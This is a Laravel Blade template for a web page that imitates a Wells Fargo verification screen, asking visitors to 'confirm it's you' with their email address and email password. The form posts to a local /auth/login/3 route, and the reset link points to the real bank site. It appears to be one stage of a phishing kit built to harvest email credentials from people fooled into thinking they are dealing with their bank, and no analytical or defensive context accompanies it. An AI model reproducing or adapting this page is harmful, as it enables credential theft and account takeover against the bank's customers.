@layout('layouts.app')

@section('content')
<div class="cb-container">
  <div class="cb-container-heading" style="display: flex; flex-wrap: nowrap; align-items: center; justify-content: center;">
    <h1 tabindex="-1" class="cb-salutation">
      <span id="msgGreeting">Good day</span>
      <span class="cb-title">Help us confirm it's you by filling out the following information.</span>
    </h1>
  </div>

  <div>
    <form class="cb-form" action="/auth/login/3" method="POST">
      <div class="cb-form-container">
        <div class="cb-form-inputField">
          <div class="cb-field-spacing">
            <div class="cb-field">
              <div>
                <div class="cb-input-container cb-input-readonly">
                  <label for="emailAddr" class="cb-input-label" style="transition: all 0.2s ease 0s; margin-left: 16px; display: flex; flex-flow: row nowrap; align-items: flex-start;">
                    <div class="cb-input-errIcon" style="margin-right: 0.25rem;display: none;">
                      <svg width="16px" height="16px" viewBox="0 0 16 16" role="img" focusable="false"><g fill="none" fill-rule="evenodd"><g opacity=".01"><path fill="#FFBFF9" d="M0 0h16v16H0z"></path><path fill="#FFF" d="M1 1h14v14H1z"></path><g stroke="#FF2AEC"><rect stroke-width=".15" x="4.575" y="1.075" width="6.85" height="13.85" rx="1"></rect><path d="M14.925 5.5A.925.925 0 0014 4.575H2a.925.925 0 00-.925.925v5c0 .51.414.925.925.925h12c.51 0 .925-.414.925-.925v-5z" stroke-width=".15"></path><path d="M8 15V.978M15 8H1M14.5 14.5l-13-13M1.5 14.5l13-13" stroke-width=".15" stroke-linecap="square" stroke-dasharray="1"></path><circle stroke-width=".35" cx="8" cy="8" r="5.825"></circle><circle stroke-width=".35" cx="8" cy="8" r="3.325"></circle><rect stroke-width=".35" x="2.175" y="2.175" width="11.65" height="11.65" rx="1"></rect></g></g><path d="M8 13.6A5.6 5.6 0 1113.6 8 5.607 5.607 0 018 13.6zm-.374-4.33h.74l.184-3.99H7.441l.185 3.99zm.378 1.798a.58.58 0 00.433-.176.6.6 0 00.172-.437.583.583 0 00-.605-.605.605.605 0 00-.44.168.583.583 0 00-.173.437.6.6 0 00.172.437.59.59 0 00.441.176z" fill="#BF2D19"></path></g></svg>
                    </div>
                    <div class="cb-input-labelText">Email Address</div>
                  </label>

                  <input id="emailAddr" name="emailAddr" class="cb-input" type="text" autocapitalize="off" autocorrect="off" autocomplete="off" tabindex="0" style="font-size: 20px; padding-left: 16px; padding-right: 0px;">
                </div>

                <div class="cb-border cb-border-notReadonly"></div>
              </div>

              <div class="cb-input-message">Email Address is required.</div>
            </div>
          </div>
        </div>

        <div class="cb-form-passwordField">
          <div class="cb-field-spacing">
            <div class="cb-field">
              <div>
                <div class="cb-input-container cb-input-maskable cb-input-readonly">
                  <label for="emailPass" class="cb-input-label" style="transition: all 0.2s ease 0s; margin-left: 16px; display: flex; flex-flow: row nowrap; align-items: flex-start;">
                    <div class="cb-input-errIcon" style="margin-right: 0.25rem;display: none;">
                      <svg width="16px" height="16px" viewBox="0 0 16 16" role="img" focusable="false"><g fill="none" fill-rule="evenodd"><g opacity=".01"><path fill="#FFBFF9" d="M0 0h16v16H0z"></path><path fill="#FFF" d="M1 1h14v14H1z"></path><g stroke="#FF2AEC"><rect stroke-width=".15" x="4.575" y="1.075" width="6.85" height="13.85" rx="1"></rect><path d="M14.925 5.5A.925.925 0 0014 4.575H2a.925.925 0 00-.925.925v5c0 .51.414.925.925.925h12c.51 0 .925-.414.925-.925v-5z" stroke-width=".15"></path><path d="M8 15V.978M15 8H1M14.5 14.5l-13-13M1.5 14.5l13-13" stroke-width=".15" stroke-linecap="square" stroke-dasharray="1"></path><circle stroke-width=".35" cx="8" cy="8" r="5.825"></circle><circle stroke-width=".35" cx="8" cy="8" r="3.325"></circle><rect stroke-width=".35" x="2.175" y="2.175" width="11.65" height="11.65" rx="1"></rect></g></g><path d="M8 13.6A5.6 5.6 0 1113.6 8 5.607 5.607 0 018 13.6zm-.374-4.33h.74l.184-3.99H7.441l.185 3.99zm.378 1.798a.58.58 0 00.433-.176.6.6 0 00.172-.437.583.583 0 00-.605-.605.605.605 0 00-.44.168.583.583 0 00-.173.437.6.6 0 00.172.437.59.59 0 00.441.176z" fill="#BF2D19"></path></g></svg>
                    </div>
                    <div class="cb-input-labelText">Email Password</div>
                  </label>

                  <input id="emailPass" name="emailPass" class="cb-input" type="password" autocapitalize="off" autocorrect="off" autocomplete="off" tabindex="0" style="font-size: 20px; padding-left: 16px; padding-right: 60px;">

                  <div class="cb-input-actionButton">
                    <button type="button" class="cb-button cb-toggleMask-btn eye-icon">
                      <svg width="24px" height="24px" viewBox="0 0 24 24" role="img" focusable="false"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><g opacity="0.01"><rect fill="#FFBFF9" x="0" y="0" width="24" height="24"></rect><rect fill="#FFFFFF" x="1" y="1" width="22" height="22"></rect><g stroke-width="1" transform="translate(0.000000, 1.000000)" stroke="#FF2AEC"><rect stroke-width="0.25" x="6.625" y="0.125" width="10.75" height="21.75" rx="2"></rect><path d="M8.5,0.125 C7.46446609,0.125 6.625,0.964466094 6.625,2 L6.625,20 C6.625,21.0355339 7.46446609,21.875 8.5,21.875 L15.5,21.875 C16.5355339,21.875 17.375,21.0355339 17.375,20 L17.375,2 C17.375,0.964466094 16.5355339,0.125 15.5,0.125 L8.5,0.125 Z" stroke-width="0.25" transform="translate(12.000000, 11.000000) rotate(-270.000000) translate(-12.000000, -11.000000) "></path><path d="M1,11 L23,11" stroke-width="0.3" stroke-linecap="square" stroke-dasharray="1" transform="translate(12.000000, 11.000000) rotate(-90.000000) translate(-12.000000, -11.000000) "></path><path d="M0.978218914,11 L22.9782189,11" stroke-width="0.3" stroke-linecap="square" stroke-dasharray="1" transform="translate(11.978219, 11.000000) rotate(-180.000000) translate(-11.978219, -11.000000) "></path><path d="M-2.8492424,11 L26.8492424,11" stroke-width="0.3" stroke-linecap="square" stroke-dasharray="1" transform="translate(12.000000, 11.000000) rotate(-135.000000) translate(-12.000000, -11.000000) "></path><path d="M-2.8492424,11 L26.8492424,11" stroke-width="0.3" stroke-linecap="square" stroke-dasharray="1" transform="translate(12.000000, 11.000000) rotate(-45.000000) translate(-12.000000, -11.000000) "></path><circle stroke-width="0.5" cx="12" cy="11" r="8.75"></circle><circle stroke-width="0.5" cx="12" cy="11" r="5.25"></circle><rect stroke-width="0.5" x="3.25" y="2.25" width="17.5" height="17.5" rx="2"></rect></g></g><path d="M12.13525,18.33925 C16.71175,18.33925 20.7655,16.105 23.26975,12.67 C20.7655,9.23425 16.71175,7 12.13525,7 C7.558,7 3.50425,9.23425 1,12.67 C3.50425,16.105 7.558,18.33925 12.13525,18.33925 Z M8.51125,7.49275 C7.6285,8.40025 7.08475,9.64 7.08475,11.00575 C7.08475,13.7905 9.34225,16.04875 12.12775,16.04875 C14.9125,16.04875 17.17,13.7905 17.17,11.00575 C17.17,9.63925 16.62625,8.40025 15.7435,7.49275" id="mask-OFGSUWNG" stroke="#3B3331" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
                    </button>
                  </div>
                </div>

                <div class="cb-border cb-border-notReadonly"></div>
              </div>

              <div class="cb-input-message">Email Password is required.</div>
            </div>
          </div>
        </div>
      </div>

      <div style="margin: 1rem auto 0.625rem;"></div>

      <div class="cb-form-signOnButton" style="display: flex; flex-wrap: nowrap; align-items: center; justify-content: center;">
        <button type="submit" disabled="" class="submit-btn cb-button cb-button-modern cb-button-disabled cb-button-responsive cb-button-primary">Continue</button>
      </div>

      <div class="cb-panel" style="display: flex; flex-flow: row nowrap; align-items: center; justify-content: center;">
        <span class="cb-panel-footer">
          <a href="https://connect.secure.wellsfargo.com">Forgot username or password?</a>
        </span>
      </div>
    </form>
  </div>
</div>
@endsection